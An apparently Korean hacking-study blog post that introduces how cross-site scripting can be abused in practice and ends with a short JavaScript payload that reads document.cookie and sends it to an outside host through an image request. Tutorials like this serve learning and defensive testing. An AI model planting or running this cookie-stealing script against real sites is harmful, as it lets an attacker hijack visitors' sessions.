Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | |
7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 | 23 | 24 | 25 | 26 | 27 |
28 | 29 | 30 | 31 |
Tags
- 화이트해커
- sql
- 보안
- wargame
- 로보어드바이저
- 해킹공부
- 뉴스스크랩
- 리눅스
- 우분투
- 모의해킹
- 퀵뉴스
- 공격기법
- 개발
- hacking
- webdev
- 간추린아침뉴스
- 핀트
- 코드스테이츠
- XSS
- 웹개발
- 해킹
- ctf
- sqlinjection
- 워게임
- 웹해킹
- webhacking
- 실습
- 앱해킹
- pm부트캠프
- 프로덕트매니저
Archives
- Today
- Total
무기는 끈기
[Web Hacking / 웹 해킹] XSS 쿠키 탈취 공격 스크립트 작성 본문
※ 설명을 위한 사진이 첨부되어 있어 PC화면으로 보는 것을 권장드립니다.
지난 게시글에선 다양한 공격기법 중 XSS의 기본 개념과 종류에 대해 알아보았다.
이번엔 XSS가 모의해킹 업무가 아닌 실제에서 어떤 식으로 악용될 수 있을지 알아보려고 한다.
XSS의 기본 개념과 종류, 작동원리가 궁금하다면 하단의 게시글 참고!
https://yubi323.tistory.com/76
[Web Hacking / 웹 해킹] XSS 크로스 사이트 스크립팅 공격기법이란?
※ 설명을 위한 사진이 첨부되어 있어 PC화면으로 보는 것을 권장드립니다. 지난 게시글에선 다양한 공격기법 중 SQL injection에 대해 알아보았다. 이번엔 XSS라는 SQLi만큼 중요하고, 유명한 공격기
yubi323.tistory.com
<코드 참고>
<script>
var cookieData = document.cookie;
var i = new Image();
i.src = "https://abcdefg1234.net/?cookieData=" + cookieData;
</script>